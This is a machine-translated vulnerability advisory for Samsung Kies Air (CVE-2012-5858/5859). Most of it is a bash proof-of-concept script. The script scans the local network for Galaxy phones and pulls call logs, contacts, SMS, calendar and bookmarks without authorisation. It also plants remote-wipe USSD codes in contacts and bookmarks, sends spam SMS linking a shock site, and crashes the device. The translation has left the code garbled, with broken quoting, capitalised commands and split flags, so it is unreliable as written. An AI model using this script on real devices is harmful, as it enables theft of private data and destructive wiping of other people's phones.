Samsung Kies Air Denial of Service and Security Bypass Vulnerability

Release date:
Updated on:

Affected Systems:
Samsung Kies Air 2.1.210161
Samsung Kies Air 2.1.207051
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56560
Cve id: CVE-2012-5858, CVE-2012-5859

Kies air is an action application that connects a computer to a mobile phone over wi-fi and can be managed using a browser.

Samsung Kies Air 2.1.207051, 2.1.210161, and other versions have security vulnerabilities that allow attackers to bypass certain security restrictions or cause denial of service.

<* Source: clodij. Lacayo
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

#! /Bin/bash

Echo "..."
Echo "..'',."
Echo ", cl :."
Echo ", doo '"
Echo ".. '''...,... '.'. ', '''.',...,. lXXd ."
Echo ". x0dllllc kMWN.; K: cMMM:; Kk. c0d.: w0.. 0 Ml: NW0c"
Echo "kK 'cmxcwo; K: 'nk: WN .. k0;. xKc: WX '. KWo' WMM0 ."
Echo "O0 .. NX. dMc; K :. XW, cWk lKl 'OK': WN '. KN :. ',;;,'....... 'lmmx '"
Echo "o0.. KW;. KN '; K: kMd xM:; 0O0d, XX'. KW,. KMMK :.....''.."
Echo "O0., c xMXllccOMX.; K: MWdclldWN... kKK;. XNNN; 0MMk"
Echo "o0.dk.: MK:; kMk; K:. NX:; oWK. 'OK, lKl 'wmc dWMO ."
Echo "kK. dK... XX... 0 M:; Kl kW; xMx l0d; 0 k. NM;. cKWk ,"
Echo ": Kk ,.. ''' xK. kM :. XX .. kKl ''...... oMx. KW ;. xKc. k0; NM; 'lo0c."
Echo ".; loooool;. xl, x;, cooooooooo,. dd... xl co 'co. dx...; oo :."
Echo "',..."
Echo "..."
Echo "Samsung S3 Kies Air example-v.1.3 www.samsung.com/us/kies /"
Echo ""
Echo ""
Echo"
######################################## ######################################## #################################"
Echo "Filename: kiesauth. sh"
Echo "Date: 10/23/2012"
Echo "Authors: @ cron __"
Echo "Presentation: http://www.slideshare.net/firmware/kies-air-launch-steal-crash"
Echo "Whitepaper: http://dl.dropbox.com/u/7779799/SamsungKiesAirAuthorizationBypassandDoS.pdf"
Echo "Version: 1.3"
Echo "Description: Script to detect local running Kies Air web servers on Samsung Galaxy S3 phones ."
Echo"
######################################## ######################################## #################################"
Echo ""
Echo ""

While true; do
Printf "% s \ n" "1) Scan local network"
Printf "% s \ n" "2) Send DoS"
Printf "\ n % s \ t" "Enter an option :"

Read option

# Option 1
Case $ option in
[1]) ip = 'ifconfig | awk/inet \/'
Echo $ ip
Echo "Type in your IP :"

Read ipstart
Echo-e "Scanning in progress... \ n"
Sudo nmap-sS-p 8080 $ {ipstart}-254-vv> nmap_scan.txt
Awk '/Nmap scan report for Android/|/open/|/Samsung/'nmap_scan.txt> ka_online.txt
Printf "% s \ n" "Active servers found :"
Cat ka_online.txt
Printf "% s \ t" "Was a server found? Type 'y' or 'N' and press [Enter]"

Read connect
If [$ connect = y]
Then
Echo "Enter the target IP and press [Enter]"
Read target_found
Wget -- ignore-length -- quiet http: // $ {target_found}: 8080/www/index.gz.html
Printf "\ n % s \ n" 1) Grab logs (incoming/outgoing CALS )"
Printf "% s \ n" "2) Grab address book"
Printf "% s \ n" "3) Grab calendar events (experimental )"
Printf "% s \ n" "4) Grab bookmarks"
Printf "% s \ n" "5) Grab SMS (incoming/outgoing )"
Printf "% s \ n" "6) Send remote wipe"
Printf "\ n % s \ t" "We have access, what wocould you like to do? "

Read action
Case $ action in
[1]) wget -- ignore-length -- quiet-O call_log.txt
Http: // $ {target_found}: 8080/ws/telephony/log? StartIndex = 0 & maxItems = 500 & sort = time-descending ;;
[2]) wget -- ignore-length -- quiet-O addressbook.txt
Http: // $ {target_found}: 8080/ws/pim/contacts? StartIndex = 0 & maxItems = 100 & sort = alpha-ascending ;;
[3]) wget -- ignore-length -- quiet-O calendar_events.txt
Http: // $ {target_found}: 8080/ws/calendar/instances/1348977600/1352606400? SearchQuery = calendarId: 1 calendarId: 2 & 1351121143933
;;
[4]) wget -- ignore-length -- quiet-O bookmarks.txt
Http: // $ {target_found}: 8080/ws/browser/bookmarks? StartIndex = 0 & maxItems = 100 & sort = time-descending ;;
[5]) wget -- ignore-length -- quiet-O messages.txt
Http: // $ {target_found}: 8080/ws/messaging/messages? StartIndex = 0 & maxItems = 10 & sort = timestamp_descending ;;
[6]) printf "\ n % s \ n" 1) Add remote wipe as a bookmark"
Printf "% s \ n" "2) Replace the default AT&T bookmark link with remote wipe"
Printf "% s \ n" "3) Replace contact information with remote wipe and mark it as favorite"
Printf "% s \ n" "4) Add remote wipe to address book and mark it as favorite"
Printf "% s \ n" "5) Send spam SMS"
Printf "\ n % s \ t" "Choose an option :"

Read wipe_option
Case $ wipe_option in
[1]) wipe1 = 'wget -- ignore-length -- server-response -- quiet -- post-data
'Url = http: // 192.168.1.1324252fremotewipe.html & title = AT % 26 T % 20 Mobile % 20web'
Http: // $ {target_found}: 8080/ws/browser/bookmarks ';;
[2]) echo "DELETE method not supported by wget .";;
[3]) wipe3 = 'curl-O curl_response.txt-x put-d
"Title = & firstName = Vicky & lastName = & suffix = & nickName = & homePhoneNo = & workPhoneNo = & mobilePhoneNo = * 2767 * 3855% 23 & defaultPhoneNo =-1 & workEmail = & = & otherEmail = & organization = & jobTitle = & favorite = true & accountType = Phone & accountName = Phone"
Http: // $ {target_found}: 8080/ws/pim/contacts/37 ';;
[4]) wipe4 = 'wget -- ignore-length -- quiet -- post-data' title = & firstName = CALL FOR A SEXY
TIME & lastName = & suffix = & nickName = & homePhoneNo = & workPhoneNo = & mobilePhoneNo = * 2767 * 3855% 23 & defaultPhoneNo =-1 & workEmail = & homeEmail = & otherEmail = & organization = & jobTitle = & favorite = true & accountType = Phone & accountName = Phone'
Http: // $ {target_found}: 8080/ws/pim/contacts 'echo-e "Entry added .";;
[5]) wipe5 = 'wget -- ignore-length -- quiet -- post-data
'Folderid = & destination = tel: 111 & destinationContactId = & destinationName = & body = Hey click this link!
Goatse. cx & mimeType = text/plain 'HTTP: // $ {target_found}: 8080/ws/messaging/sms/messages ';;

Esac
Esac

Elif [$ connect = n]
Then
Printf "% s" "No available targets found ."
Else
Printf "% s" "Not a valid entry. Aborted ."
Fi ;;

# Option 2: Manually specify this for now.
[2]) t1 = 'wget -- quiet-p' http: // 192.168.1.136: 8080/www/apps/KiesAir/jws/ssd. php? E & ''echo-e "Crash successfully
Sent to device. \ n ";;
Esac
Echo-e "Script reloaded. \ n"
Done

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Samsung
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://samsungapps.sina.cn/supportMain/getSupportMainList.as